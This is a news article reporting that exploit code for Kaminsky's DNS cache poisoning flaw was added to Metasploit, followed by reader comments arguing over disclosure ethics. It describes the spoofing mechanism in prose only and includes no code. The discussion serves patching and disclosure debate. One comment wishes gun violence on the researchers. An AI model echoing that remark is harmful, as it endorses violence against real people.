Attack code published for DNS flaw

Attack code published for DNS flaw

Summary: The urgency to patch Dan Kaminsky's DNS cache poisoning vulnerability just went up a few notches.Exploit code for the flaw, which allows the insertion of malicious DNS records into the cache of the target nameserver, has been added to Metasploit, a freely distributed attack/pen-testing tool.


Exploit posted for DNS cache poisoning vulnerability The urgency to patch Dan Kaminsky's DNS cache poisoning vulnerability just went up a few notches.

Exploit code for the flaw, which allows the insertion of malicious DNS records into the cache of the target nameserver, has been added to Metasploit, a freely distributed attack/pen-testing tool.

According to Metasploit creator HD Moore (left), who teamed up with researcher |)ruid to create the exploit, a DNS service has also been created to assist with the exploit.

[ SEE: Vulnerability disclosure gone awry: Understanding the DNS debacle ]

The code, available here, takes aim at known deficiencies in the DNS protocol and common DNS implementations that aid in serious cache poisoning attacks.

This exploit caches a single malicious host entry into the target nameserver.  By causing the target nameserver to query for random hostnames at the target domain, the attacker can spoof a response to the target server including an answer for the query, an authority server record, and an additional record for that server, causing target nameserver to insert the additional record into the cache.

In an IM exchange, Moore told me his exploit takes about a minute or two to poison a DNS cache but said he is working to improve it in version 2.0.

Kaminsky in on record as saying it is possible to launch a successful attack in a matter of seconds.

Patch now! Please.

Topics: Security, Browser, Networking

Kick off your day with ZDNet's daily email newsletter. It's the freshest tech news and opinion, served hot. Get it.


Log in or register to join the discussion
  • Irresponsible and evil

    "In an IM exchange, Moore told me his exploit takes about a minute or two to poison a DNS cache but said he is working to improve it in version 2.0."

    As far as i am concerened he is just an evil person to do what he did. What positive will come of this? People getting ripped off with his help by making a "Better,Faster Program" to exploit the bug. I just don't see how this is not a criminal act?
    • Quote: "What positive will come of this?"

      This exploit was not rocket science and the articles published leading up to Dan Kaminsky's appearance provided enough data for most knowledgeable hackers to exploit it.

      Now back to "What positive will come of this?":
      The blackhats already have this exploit in the wild, no two ways about it. So what positive will come out the MetaSploit DNS exploit is that You as a security officer or systems admin can get the MetaSploit Framework, compile it for yourself and see how exposed you are to the issue before someone else with more nefarious plans does the same.

      If you are so naive that you think that this isn't already out in the wild then might I suggest a carreer change such as "Would you like some fries with that order?"
      • Assumption

        Ya know what they say,assumption is the mother of all F$#k ups. you assume that i work in the IT profession,i don't,i am just a normal computer user the likes to read tech news. Stop making excuses for people that do stupid things,like releasing exploit codes before people have the time to fix and patch the code.

        I stand by my comment as nothing you have said is a good reason for what he did. Nothing good will come of the stupid exploit release,unless there black-hat criminals
        • And yet, you assume...

          >> Ya know what they say,assumption is the
          >> mother of all F$#k ups.

          And yet, you assume something to be evil, in an industry in which you have no formal education.

          I for one find this useful as the exploit will help a sysadmin find holes in his system in no time. Without such a toolkit, it is almost impossible to know what needs to be patched.

          This exploit was certainly in existence among the true bad guys, or something close by it, as soon as it was disclosed a major DNS vulnerability existed, perhaps even before the announcement.

          We who make a living as IT professionals are always on the catch-up with the bad guys. That's the nature of this complex business. Toolkits like this help in the catching up by early identification of vulnerabilities.

          Also saying that you stand by your original opinion does not mean anything. Opinions are not fact, but just that, opinions. Yours is subjective and uneducated.

          You are certainly entitled to as it is your right. It does not make it a valid one, however. You are not an IT professional, and certainly not a sysadmin or IT security expert. As much right you have of voicing your opinion, it is useless and mistaken in this particular context regardless of how proudly you stand on a soapbox proclaiming that you stand by it.
          • hmmmm....

            "This exploit was certainly in existence among the true bad guys, or something close by it, as soon as it was disclosed a major DNS vulnerability existed, perhaps even before the announcement."

            as soon as - wow they're that fast at coding, and finding the exact exploit. I'd say a few days(at most), but before or as soon as would be a lot more likely. Yes the bad guys are innovative, but that doesn't mean that they have these plots before we figure them out, just before we figure out to to defend against them. The good guys are just in a constant race condition with the bad guys, sometimes we make it, sometimes they make. No guarantee either way.

            Now, as far as your arrogant and annoying dismissal because stan57 is not an it professional, that's just disheartening. You fail to appreciate that perception is reality, if the general public begins to think that this type of behavior is irresponsible no matter how often it happens or doesn't happen they are the ones that matters. Remember, your jobs exist only because PEOPLE need them to exist.
            His opinion may be mistaken, easy to do not being an it professional, but useless it is not.

            You're right, opinions are just that, opinions and his, while uneducated didn't attack you in any way, shape or form. Your opinion, is also subjective, however it's also condescending, rude and arrogant.

            "We who make a living as IT professionals are always on the catch-up with the bad guys. That's the nature of this complex business."
            This is just pompous.
            "The it security industry is a rapidly changing landscape, which can be hard to keep up with, that's why I appreciate a toolkit like X provided for this bug."
            A lot less confrontational, elitist, and alienating way to speak with people. No wonder us computer geeks have a bad image, too many of us lack "da' social skills."
        • Assumption (of your own)

          OK Stan57, I AM a computer security professional, and I don't have time to learn how to try all the new exploits, so I rely on MetaSploit to test, and MORE IMPORTANTLY, to prove to management and developers that these type of things CAN be hacked... that they are NOT hypothetical. That's often the only thing that gets traction to get them to fix the flaws and weaknesses. And I know many others in my field who do the same as I, so it's not just me!
          Anonymous InfoSec dude,
          with CISSP and GCFA
    • wrong

      Perhaps the question is rather: "Why should this be illigal?". Just because something can be used for "EVIL" doesn't mean it should be outlawed.
    • RE: Irresponsible and evil

      So, your solution is to shoot the messenger? Or, is it to make sure that the privileged get the info first and everyone later, if at all? Are you someone's lackey?

      I, for one, am glad the exploit was published. First, that will destroy any perceived buffer time that could justify procrastination by those offering money related services (and this is all about money) so they can protect their bottom line. Microsoft uses this approach and we all know the results of that policy --- millions of Windows users have had their personal info stolen and abused. Secondly, it gives me the opportunity to evaluate for myself the criticality of this exploit. In my case, I do not plan to access my online bank account, nor Amazon, nor my phone company's site, etc..., until I am sure this hack is fixed. When vendors like Amazon start noticing a drop in business you can be sure they will put on the heat where it needs to be applied.

      Daniel Bernstein published a critique of the DNS about five years ago. Daniel Kaminsky probably just read it and decided to exploit it for publicity. Who knows? Maybe this will finally lead to TCP/IP 2.0 and a more secure IP packet design.
      • pad time...

        Not sure of the exact numbers, but pad time was added to the 30 day buffer zone most likely to ensure that any problems could have a little time to iron out. I find it hard to believe that this patch would be as simple as "Click to patch", no reboot, no possible server down time. I would imagine that this is a patch that the community needed some time to implement.

        Oh, and if the people that pay the most money get some of the details worked out a bit sooner, welcome to Capitalism - our world as we know it has prospered under it.
  • I can't think of ANYONE who deserves to be...

    ...on the wrong end of a Glock right about now.
    • Oh grow up cowboy! Ignorance is not bliss.

      Do you honestly think that this is the only copy of the exploit out there?
      At least with |)ruid's code you can compile it yourself and test your DNS.

      Have the Blackhets that already have this exploit offered you that?
      • No, but keeping the script kiddies & uneducated but resourceful terrorist.

        in the dark, might be nice. Living by the sword, kaminsky's showmanship brought out the showman in others. Either trying to steal some of his thunder, or in this case, just grabbing on for the ride. I don't doubt there are a few dozen that have worked this exploit already. But there are hundreds of blackhearts that have the desire but not the skilz. This is comparable to dumping a bunch of loaded handguns in the Monkey cage at the zoo. Someones going to be hurt.
        • Godwins Law, but now on terrorists?

          You just killed your argument. What terrorists are knowledgeable on computer security?! Stop repeating scare-mongering propaganda, please.

          • Publish just 2 days & the attacks are on. Maybe I was right, hmmm?

            Do you really believe there are no geek jihadis? How many terror recruitment sites are there? Heck, some Al-Jazeera's best reporting comes from tech-tard terrorists.

            I'll grant, there is a much higher chance these are script kiddies criminals, and not the, bring on the apocalypse, terrorist. But there is more than a fair chance, these attackers are armed with metasploit's published code.

            Egotism putting many of us at risk. So now someone will rush out some, not completely vetted fix. That may or may not leave our backsides exposed through some other avenue.
  • So What

    Ok so it's sort of dickish that HDM published this exploit, but guess what, this attack is already in the wild. Moore and |)ruid just have big ole brass balls for releasing this exploit code publicly.

    The fact is the cat is out of the bag, anyone with a modicum of skills can create a similar exploit in a couple hours or even less, and could have done so since at least three days ago when Halvar posted his initial conjecture (ok maybe 1-2 days if you are a pessimist/optimist).

    Regardless of what you think about that (I am pretty ambivalent about it, unless you think Halvar is smarter then every blackhat), there is no real harm in it.

    As I said, this exploit has been already seen in the wild, the code is out there, if anything this just further illustrates the need to patch your systems. people who are going to exploit this are either already doing so or are preparing to do so very shortly, and with the money at stake for successfully exploiting this you can bet they aren't waiting around for some public exploit code to be released when its so easy to roll their own.

    P.S. Ryan, Stop being such a hate monger about this and making it look like the security community is full of petty infighting, Tom apologized for his (I believe) honest mistake. Matasano isn't exactly a no name outfit trying to garner publicity for themselves. I'm sure Kaminsky is pretty upset, to put it mildly, but in the end mistakes happen, lets all grow up. Hell I could even defend Halvar talking about the bug by saying that security through obscurity ain't the best. This just sped up peoples patch cycles a bit, it's not the end of the world.
    • AGREED, and it gives you test code....

      to test your systems with before the exploits in the wild do it for you.

      I feel bad for Dam Kaminsky as this kind of "rains of his parade" when it comes to his presentation.

      But the fact of the matter is that it was already making the rounds before HD and Metasploit published it.
    • true but,

      if you've followed the entire story there was a very coordinated effort by a majority of affected system. Had the community swallowed it's ego a bit and maybe conjecture in a very closed system - like maybe face to face. If Halvar hadn't needed to feed his ego it would have given a bit more of a chance to get as much patched. As much as I applaud blogs, there are situations that a person should learn to keep the proverbial cake hole shut.
      Follow the hypocratic oath do no harm. If you think that it's possible an exploit could be harmful - contact the company (duh statement). If it had been said there is a FIX ON THE WAY, then shut up and try doing something productive - posting conjectures that could very potentially speed up the exploit being implemented most of the time doesn't help - it just gives virus makers (script kiddies too) a brand new target - and there's a hell of a lot more of them then there are people working to fix the exploits in the first place.
      Yes mistakes happen, but these weren't just honest mistakes, they were ego getting in the way of common sense. And just letting them off with mistakes are made then it will happen again. Nobody will say "Oh, there are serious consequences to my actions, I think I'll tell people about this exploit that does causes the user to try and shove they're nose in people's ears."
      The fact is that the people that openly made conjectures (a good thing in general) about something that was said to have a fix on the way, just because they had to know what it is. Sounds childish to me "I want to know, I want to know, I want to know!!!!!" <stomping feet on the ground>
      Growing up includes using some common sense, which should have convinced them to act more responsibly.
  • RE: Attack code published for DNS flaw

    Thanks for the information. Our organization is now doing the update. My fear now is with the Kaminsky's update now public, won't the bad guys find out how it's working and eventually find a way to circumvent it as this writer suggested? DNS Revolutions & Evolutions(
  • For those of you..

    Thinking that this exploit release is a bad thing.. think about how nice it would be for this to remain a silent exploit for.. say maybe China to redirect your DNS.. there.. feel better now?
    • Just plain dumb

      Thats doesn't make me feel any safer. Releasing exploit code to the wild before people have the time to patch there systems is just plain criminal. And if i was one of the people to get exploited because of this i would sue his butt into oblivion.

      I would love to see theses people start to get sued for there irresponsible and criminal actions.